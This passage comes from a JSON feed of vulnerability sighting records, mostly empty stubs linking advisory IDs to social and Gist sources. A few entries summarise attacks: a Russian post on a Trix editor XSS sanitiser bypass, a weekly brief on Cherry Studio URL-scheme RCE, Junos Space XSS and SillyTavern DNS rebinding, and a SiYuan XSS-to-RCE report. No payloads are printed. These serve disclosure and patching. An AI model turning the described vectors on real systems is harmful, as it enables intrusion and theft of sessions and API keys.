thwin_htet \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b, \u0447\u0442\u043e Trix \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e \u0441\u0430\u043d\u0438\u0442\u0430\u0439\u0437\u0438\u043b HTML, \u0432\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0439 \u0438\u0437 \u0431\u0443\u0444\u0435\u0440\u0430 \u043e\u0431\u043c\u0435\u043d\u0430. \u0415\u0441\u043b\u0438 \u043f\u043e\u0434\u043c\u0435\u043d\u0438\u0442\u044c contentType \u043d\u0430 text/html5 \u0432\u043d\u0443\u0442\u0440\u0438 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0430 data-trix-attachment, \u0442\u043e \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0439 \u0441\u0430\u043d\u0438\u0442\u0430\u0439\u0437\u0435\u0440 \u043f\u0440\u043e\u043f\u0443\u0441\u043a\u0430\u043b \u0442\u0435\u0433\u0438  \u0441 \u0438\u043d\u043b\u0430\u0439\u043d\u043e\u0432\u044b\u043c\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430\u043c\u0438 \u0441\u043e\u0431\u044b\u0442\u0438\u0439, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, onerror. \u042d\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u043b\u043e \u043a \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e JS-\u043a\u043e\u0434\u0430 \u0443 \u0432\u0441\u0435\u0445, \u043a\u0442\u043e \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u043b \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u0443\u044e \u0437\u0430\u043c\u0435\u0442\u043a\u0443, \u0437\u0430\u0434\u0430\u0447\u0443 \u0438\u043b\u0438 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439.\n\u0417\u0430\u0431\u0430\u0432\u043d\u043e, \u0447\u0442\u043e \u044d\u0442\u043e \u0431\u044b\u043b \u043e\u0431\u0445\u043e\u0434 \u043f\u0430\u0442\u0447\u0430 CVE-2024-34341, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u043c\u0435\u0441\u044f\u0446\u0435\u043c \u0440\u0430\u043d\u0435\u0435!\n\n\ud83d\udee0 \u041a\u0430\u043a \u044d\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u043b\u043e? \u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u043c\u043e\u0433 \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e HTML-\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443:\n\n\n\u041f\u0440\u0438 \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0438 \u0438 \u0432\u0441\u0442\u0430\u0432\u043a\u0435 \u044d\u0442\u043e\u0433\u043e (\u0441\u043a\u0440\u044b\u0442\u043e\u0433\u043e) \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e \u0432 \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440 Trix, XSS-\u043a\u0430 \u0441\u0440\u0430\u0437\u0443 \u0436\u0435 \u043e\u0442\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u043b\u0430. \u041f\u0440\u043e\u0441\u0442\u043e, \u043d\u043e \u0438\u0437\u044f\u0449\u043d\u043e!\n\n\ud83d\udca5 \u0418\u043c\u043f\u0430\u043a\u0442 \u0431\u044b\u043b \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u043c:\n\u2013 \u041a\u0440\u0430\u0436\u0430 CSRF-\u0442\u043e\u043a\u0435\u043d\u043e\u0432 \u0438 \u0441\u0435\u0441\u0441\u0438\u043e\u043d\u043d\u044b\u0445 cookies.\n\u2013 \u0412\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f (\u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435/\u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u0437\u0430\u0434\u0430\u0447, \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0430 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439).\n\u2013 \u0422\u0435\u043e\u0440\u0435\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f XSS-\u0447\u0435\u0440\u0432\u044f.\n\n\ud83d\udcb8 \u041d\u0430\u0433\u0440\u0430\u0434\u0430 \u0438 \u0444\u0438\u043a\u0441: \u0411\u0430\u0433 \u0431\u044b\u043b \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d, \u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u043b $1000 (\u043d\u0438\u0436\u043d\u044f\u044f \u0433\u0440\u0430\u043d\u0438\u0446\u0430 \u0434\u043b\u044f high-severity). \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 Trix 2.1.5 (PR #1156), \u0430 GitHub \u043f\u0440\u0438\u0441\u0432\u043e\u0438\u043b \u0435\u0439 \u043d\u043e\u0432\u044b\u0439 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 GHSA-qm2q-9f3q-2vcv.\n\n\n\ud83d\udca1 \u041b\u044e\u0431\u044b\u0435 \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0441\u043d\u044b\u0435 \u0444\u043e\u0440\u043c\u0430\u0442\u044b \u0434\u0430\u043d\u043d\u044b\u0445 (\u0430\u0442\u0442\u0430\u0447\u0438, oEmbed, Markdown) \u0442\u0440\u0435\u0431\u0443\u044e\u0442 \u043c\u043d\u043e\u0433\u043e\u0441\u0442\u0443\u043f\u0435\u043d\u0447\u0430\u0442\u043e\u0439 \u0438 \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0434\u0435\u0437\u0438\u043d\u0444\u0435\u043a\u0446\u0438\u0438. \"\u0421\u043a\u0440\u044b\u0442\u044b\u0435\" \u043f\u043e\u043b\u044f \u0438 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u0447\u0430\u0441\u0442\u043e \u0441\u0442\u0430\u043d\u043e\u0432\u044f\u0442\u0441\u044f \u0438\u0434\u0435\u0430\u043b\u044c\u043d\u044b\u043c \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u043c \u0434\u043b\u044f \u0430\u0442\u0430\u043a\u0438. \u041d\u0435 \u0437\u0430\u0431\u044b\u0432\u0430\u0439\u0442\u0435 \u043f\u0440\u043e CSP \u0438 \u0440\u0435\u0433\u0440\u0435\u0441\u0441\u0438\u043e\u043d\u043d\u044b\u0435 \u0442\u0435\u0441\u0442\u044b!\n\n\ud83d\udd17 \u0423\u0437\u043d\u0430\u0442\u044c \u0432\u0441\u0435 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0434\u0435\u0442\u0430\u043b\u0438 \u0438 \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c PoC \u043c\u043e\u0436\u043d\u043e \u0432 \u043f\u043e\u043b\u043d\u043e\u043c \u0440\u0430\u0437\u0431\u043e\u0440\u0435:\neh.su/reports/85", "creation_timestamp": "2025-05-12T18:04:32.000000Z"}, {"uuid": "d858e8e3-efcb-4c31-a7eb-0fa36f1ca910", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7CXJ-W27X-X78Q", "type": "seen", "source": "https://t.me/bhhub/1170", "content": "Weekly Brief \u2014 Actively Exploited &amp; Critical Vulns\n\nOne-click RCE chains, cross-site scripting in network management suites, and LLM interface takeover vectors defined this week\u2019s threat landscape.  \nThe most urgent issues involve active exploitation, drive-by execution, and critical CVSS \u2265 9 vulnerabilities in AI and enterprise tools.\n\n\u2b50\ufe0f CVE-2025-61929 \u2014 Cherry Studio (One-Click RCE via URL Protocol, CVSS 9.6)\n\nProduct: Cherry Studio (Desktop LLM client)  \nVector: cherrystudio:// custom URL scheme \u2192 base64-encoded command execution\n\nCherry Studio registers a custom URL handler (`cherrystudio://`) that processes encoded configuration data and executes embedded commands.  \nAttackers can host malicious URLs that trigger arbitrary command execution upon a single click \u2014 no secondary confirmation required.  \nExploitation was observed within 48 hours of disclosure.\n\nhttps://github.com/cherry-studio/advisories\n\n\u2b50\ufe0fCVE-2025-59978 \u2014 Juniper Junos Space (Stored XSS \u2192 Admin Command Execution, CVSS 9.0)\n\n\nProduct: Juniper Networks Junos Space (&lt; 24.1R4)  \nVector: Persistent JavaScript injection in management web interface\n\nImproper input sanitization in Junos Space allows stored XSS, which can escalate to admin-level command execution when viewed by privileged users.  \nExploitation has been observed in active campaigns, potentially linked to Cl0p ransomware operators targeting network appliances.\n\nhttps://supportportal.juniper.net/JSA103140\n\n\u2b50\ufe0f CVE-2025-59159 \u2014 SillyTavern (DNS Rebinding / Remote Takeover, CVSS 9.6)\n\nProduct: SillyTavern (LLM Web Interface &lt; 1.13.4)  \nVector: Insecure hostname validation \u2192 DNS rebinding attack\n\nSillyTavern\u2019s local web server does not properly validate inbound host headers.  \nAttackers can exploit DNS rebinding to interact with local AI instances remotely \u2014 stealing API keys or installing malicious extensions.\n\nhttps://github.com/SillyTavern/SillyTavern/security/advisories/GHSA-7cxj-w27x-x78q", "creation_timestamp": "2025-10-21T13:59:09.000000Z"}, {"uuid": "571df4b4-afe8-48bf-aaca-ce84c666c841", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C4J6-FC7J-M34R", "type": "seen", "source": "Telegram/6_gD9pQtVCg_eRlU_-Eqvw6JM83wq5C4Rc0rf2uF-yzttPU", "content": "", "creation_timestamp": "2026-05-13T09:00:04.000000Z"}, {"uuid": "0ada6e4d-a88c-46e1-b0e5-6ba836c11f9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-56mp-4f3v-fgj2", "type": "seen", "source": "https://gist.github.com/alon710/215bfec609456ef9029abde8936c9791", "content": "# CVE-2026-50551: CVE-2026-50551: Stored Cross-Site Scripting to Remote Code Execution via Attribute View Asset Cell Renderer in SiYuan\n\n&gt; **CVSS Score:** 9.9\n&gt; **Published:** 2026-07-10\n&gt; **Full Report:** https://cvereports.com/reports/CVE-2026-50551\n\n## Summary\nA critical-severity stored Cross-Site Scripting (XSS) vulnerability exists in SiYuan's Attribute View database asset cell renderer. This flaw allows low-privilege authenticated users to execute arbitrary JavaScript in the application frontend. In Electron-based desktop clients, this execution context can be leveraged to execute arbitrary native operating system commands, resulting in complete system compromise.\n\n## TL;DR\nStored XSS in SiYuan's database asset renderer allows unauthenticated remote code execution via synchronizing a maliciously crafted database in Electron clients.\n\n## Exploit Status: POC\n\n## Technical Details\n\n- **CWE ID**: CWE-79\n- **Attack Vector**: Network (AV:N)\n- **CVSS Score**: 9.9 (Critical)\n- **Impact**: Remote Code Execution (RCE)\n- **Exploit Status**: Proof of Concept (PoC) documented\n- **KEV Status**: Not listed\n\n## Affected Systems\n\n- SiYuan (Desktop App &amp; Self-hosted Server)\n- **siyuan**: &lt; 3.7.0 (Fixed in: `3.7.0`)\n\n## Mitigation\n\n- Upgrade the SiYuan application to version 3.7.0 or later immediately.\n- Isolate self-hosted servers behind access control lists to prevent untrusted database synchronization.\n- Enforce context isolation policies in desktop environments to contain potential renderer compromises.\n\n**Remediation Steps:**\n1. Identify all deployed desktop clients and self-hosted instances of SiYuan.\n2. Download and install version 3.7.0 or higher from the official repository or application store.\n3. Verify the application version via the settings interface to ensure the patch is applied.\n\n## References\n\n- [GitHub Security Advisory GHSA-56mp-4f3v-fgj2](https://github.com/siyuan-note/siyuan/security/advisories/GHSA-56mp-4f3v-fgj2)\n- [NVD Vulnerability Detail](https://nvd.nist.gov/vuln/detail/CVE-2026-50551)\n- [CVE Authority Record](https://www.cve.org/CVERecord?id=CVE-2026-50551)\n- [Fix Merge Commit](https://github.com/siyuan-note/siyuan/commit/27e0051e0d067892e833df1063cb2fb469600e98)\n\n\n---\n*Generated by [CVEReports](https://cvereports.com/reports/CVE-2026-50551) - Automated Vulnerability Intelligence*", "creation_timestamp": "2026-07-10T23:42:38.205669Z"}, {"uuid": "82ed63fa-e4a4-4bcc-a6e4-4c8758888c2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3p69-m8gg-fwmf", "type": "seen", "source": "https://gist.github.com/sl4x0/f22a1e5c94ebe3c82b21e85010eb6e32", "content": "", "creation_timestamp": "2026-08-22T14:51:29.115615Z"}, {"uuid": "002e2985-024c-443f-9031-893ca1e6ff50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20160218-GLIBC", "type": "seen", "source": "https://t.me/informationsec/693", "content": "", "creation_timestamp": "2026-08-22T14:00:22.062333Z"}, {"uuid": "3c2923e6-c4fd-4513-b04e-1c900f29b59a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20160330-FP", "type": "seen", "source": "https://t.me/informationsec/850", "content": "", "creation_timestamp": "2026-08-22T14:00:21.187254Z"}, {"uuid": "19e3ef86-9bf6-4e1b-8914-c649f0a417b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20161102-ESA", "type": "seen", "source": "https://t.me/informationsec/1437", "content": "", "creation_timestamp": "2026-08-22T14:00:18.031013Z"}, {"uuid": "da6b3393-a325-4a20-9bc0-8a6b8d1c36d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20161102-N9KAPIC", "type": "seen", "source": "https://t.me/informationsec/1437", "content": "", "creation_timestamp": "2026-08-22T14:00:17.997451Z"}, {"uuid": "10bea717-7cde-4d43-94a5-5c9b0fae8650", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20161102-ASR", "type": "seen", "source": "https://t.me/informationsec/1437", "content": "", "creation_timestamp": "2026-08-22T14:00:17.923407Z"}, {"uuid": "2ba1f9c8-3517-4b1c-892c-9d698faf0a26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20161102-TL1", "type": "seen", "source": "https://t.me/informationsec/1437", "content": "", "creation_timestamp": "2026-08-22T14:00:17.894283Z"}, {"uuid": "47d37333-0252-401d-8b62-1cd42a49b3a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20161102-TP", "type": "seen", "source": "https://t.me/informationsec/1437", "content": "", "creation_timestamp": "2026-08-22T14:00:17.261538Z"}, {"uuid": "90553017-649b-4cae-a9fa-3f8215987c5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20161026-LINUX", "type": "seen", "source": "https://t.me/informationsec/1437", "content": "", "creation_timestamp": "2026-08-22T14:00:17.229141Z"}, {"uuid": "e61766b2-4e86-4794-ae17-da53b49187d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20161026-ESAWSA3", "type": "seen", "source": "https://t.me/informationsec/1437", "content": "", "creation_timestamp": "2026-08-22T14:00:17.205781Z"}, {"uuid": "550bbc96-7a9e-4849-adf5-8d637887030e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20161102-CMS", "type": "seen", "source": "https://t.me/informationsec/1437", "content": "", "creation_timestamp": "2026-08-22T14:00:17.185789Z"}, {"uuid": "4c01134a-ca45-4b71-b197-cdf459a8fb36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20161102-CPH", "type": "seen", "source": "https://t.me/informationsec/1437", "content": "", "creation_timestamp": "2026-08-22T14:00:17.161956Z"}, {"uuid": "332a7c9f-469f-428d-9ed7-453087cdc671", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20161102-CMS1", "type": "seen", "source": "https://t.me/informationsec/1437", "content": "", "creation_timestamp": "2026-08-22T14:00:17.047104Z"}, {"uuid": "c641f397-6850-4324-b7a7-387e4d9bc427", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170125-CAS", "type": "seen", "source": "https://t.me/informationsec/1610", "content": "", "creation_timestamp": "2026-08-22T14:00:16.749771Z"}, {"uuid": "43b145dc-adf8-475a-9274-55d1adc51d90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170124-WEBEX", "type": "seen", "source": "https://t.me/informationsec/1610", "content": "", "creation_timestamp": "2026-08-22T14:00:16.727915Z"}, {"uuid": "de01c18f-b011-408e-9877-1ac040316b07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170125-EXPRESSWAY", "type": "seen", "source": "https://t.me/informationsec/1610", "content": "", "creation_timestamp": "2026-08-22T14:00:16.709540Z"}, {"uuid": "2f3c4214-bb23-47d3-88e1-52720108e537", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170317-CMP", "type": "seen", "source": "https://t.me/informationsec/1739", "content": "", "creation_timestamp": "2026-08-22T14:00:16.685807Z"}, {"uuid": "61dc1073-a6d5-4e0d-9ee9-481c21e188d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170125-TELEPRESENCE", "type": "seen", "source": "https://t.me/informationsec/1610", "content": "", "creation_timestamp": "2026-08-22T14:00:16.618563Z"}, {"uuid": "0c7de8f1-b33f-49f9-85b5-2a28bfafbe11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170419-UCM", "type": "seen", "source": "https://t.me/informationsec/1768", "content": "", "creation_timestamp": "2026-08-22T14:00:16.564094Z"}, {"uuid": "3dbb4f18-657f-4655-a912-90b22ca610a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170419-ENERGYWISE", "type": "seen", "source": "https://t.me/informationsec/1768", "content": "", "creation_timestamp": "2026-08-22T14:00:16.524447Z"}, {"uuid": "7a805f78-0b28-4aa1-8215-561aa8108b9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170419-FPSNORT", "type": "seen", "source": "https://t.me/informationsec/1768", "content": "", "creation_timestamp": "2026-08-22T14:00:16.501045Z"}, {"uuid": "2fc43b65-4989-4da0-b69e-4c2cc35069e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-SMI2", "type": "seen", "source": "https://t.me/informationsec/2587", "content": "", "creation_timestamp": "2026-08-22T14:00:16.326550Z"}, {"uuid": "d055ea34-7f01-48bc-b268-1e09c6f01acc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180129-ASA1", "type": "seen", "source": "https://t.me/informationsec/2430", "content": "", "creation_timestamp": "2026-08-22T14:00:16.301827Z"}, {"uuid": "89b3f747-e732-4037-b869-d143ebca2c76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170214-SMI", "type": "seen", "source": "https://t.me/informationsec/2591", "content": "", "creation_timestamp": "2026-08-22T14:00:16.273821Z"}, {"uuid": "6126e45d-d32f-4406-9d64-8465f8435322", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-SMI", "type": "seen", "source": "https://t.me/informationsec/2591", "content": "", "creation_timestamp": "2026-08-22T14:00:16.154961Z"}, {"uuid": "b269277a-a06f-4ba4-b2f1-6df3d52e88e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r5pq-6chh-j3xp", "type": "seen", "source": "https://gist.github.com/alon710/31e18879d387aa16512f599cadd2f7a1", "content": "", "creation_timestamp": "2026-08-22T12:31:57.180401Z"}, {"uuid": "2fad110c-a02d-4a5a-8aa7-370eff76f6b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r292-9mhp-454m", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mtoa3ig3u42e", "content": "", "creation_timestamp": "2026-08-22T12:01:23.202132Z"}, {"uuid": "95090d49-7436-4839-8d90-ff5254b8a6aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P9R8-2Q67-FP86", "type": "seen", "source": "https://t.me/HackerNewscyber/3351", "content": "", "creation_timestamp": "2026-08-22T12:00:05.316482Z"}, {"uuid": "b44ee4aa-66eb-414a-81e0-f3319fc20f4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-864f-rcv7-6rh4", "type": "seen", "source": "https://bsky.app/profile/eyalestrin.bsky.social/post/3mto6unvzgq2l", "content": "", "creation_timestamp": "2026-08-22T11:39:38.788752Z"}, {"uuid": "af748a26-60ea-46cb-9715-ecc34858f35c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5vf6-jrqr-78fj", "type": "seen", "source": "https://gist.github.com/alon710/d92488505ce17a941a9b8015b1dda8cf", "content": "", "creation_timestamp": "2026-08-22T11:31:40.300847Z"}, {"uuid": "574a7c58-5d6b-4517-86d3-fc44e80c0373", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w4mq-xh27-6xpx", "type": "seen", "source": "https://gist.github.com/alon710/2b3f0356900578390c8450f33458882e", "content": "", "creation_timestamp": "2026-08-22T10:31:15.366748Z"}, {"uuid": "20277bdb-7273-4365-82f4-ce1a76067631", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mqjf-5f49-2fjh", "type": "seen", "source": "https://gist.github.com/alon710/5c5c31a44818bfd282b695c164d075db", "content": "", "creation_timestamp": "2026-08-22T09:31:53.435655Z"}, {"uuid": "a57f3836-1b12-4034-87be-2fd361aa21c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jg4p-g6xj-4qmf", "type": "seen", "source": "https://gist.github.com/alon710/b7fa1b8a029c3e91e2e782156a414d06", "content": "", "creation_timestamp": "2026-08-22T08:32:19.215475Z"}, {"uuid": "f2bb30c5-a1f4-4583-8a62-fd89763aedcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mqjf-5f49-2fjh", "type": "seen", "source": "https://bsky.app/profile/kotosecurity.bsky.social/post/3mtnsmilerf22", "content": "", "creation_timestamp": "2026-08-22T08:00:19.931359Z"}, {"uuid": "403b3208-9132-48f1-9f6f-4972c3a8d681", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cqmq-8755-7xvh", "type": "seen", "source": "https://gist.github.com/alon710/fba1ad6c3ccaacdec698da20783bacca", "content": "", "creation_timestamp": "2026-08-22T07:32:13.184805Z"}, {"uuid": "a4bcc9f6-4efa-4658-9d07-f218cd4e157d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mp57-r77r-477p", "type": "seen", "source": "https://gist.github.com/goncardanil40-creator/7ea6a1fd3f96528e27d2929f12660f72", "content": "", "creation_timestamp": "2026-08-22T07:19:04.874630Z"}, {"uuid": "b5a7d8f9-b61f-4a37-b52f-ef5317f64b1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-26w5-6g95-gj28", "type": "seen", "source": "https://gist.github.com/alon710/ab99d0934f6a3237c0cc69fe76b31465", "content": "", "creation_timestamp": "2026-08-22T06:31:28.577269Z"}, {"uuid": "49d0ec6b-a67d-4115-bdc3-8bdfc6fbd6ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mmfr-pmjx-hw9w", "type": "seen", "source": "https://gist.github.com/alon710/a8fb06e2d4be25e5dcde47f19754cbdb", "content": "", "creation_timestamp": "2026-08-22T05:32:17.948013Z"}, {"uuid": "13ec6dcf-75b5-450f-a40d-5707d78578a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrwp-4hh9-c8r8", "type": "seen", "source": "https://gist.github.com/alon710/6c6dab5e1a3a671fb5c0adb7c14c9092", "content": "", "creation_timestamp": "2026-08-22T04:31:35.589186Z"}, {"uuid": "b1a68e8c-3780-4749-b92a-2c4e9b8192e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x2rj-828p-hx9m", "type": "seen", "source": "https://gist.github.com/alon710/81c41b230edf2bb67889e76531f6c94f", "content": "", "creation_timestamp": "2026-08-22T03:31:16.490598Z"}, {"uuid": "f088a79b-98a4-4075-b55b-74b6e03349b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xhj3-7xw9-vr34", "type": "seen", "source": 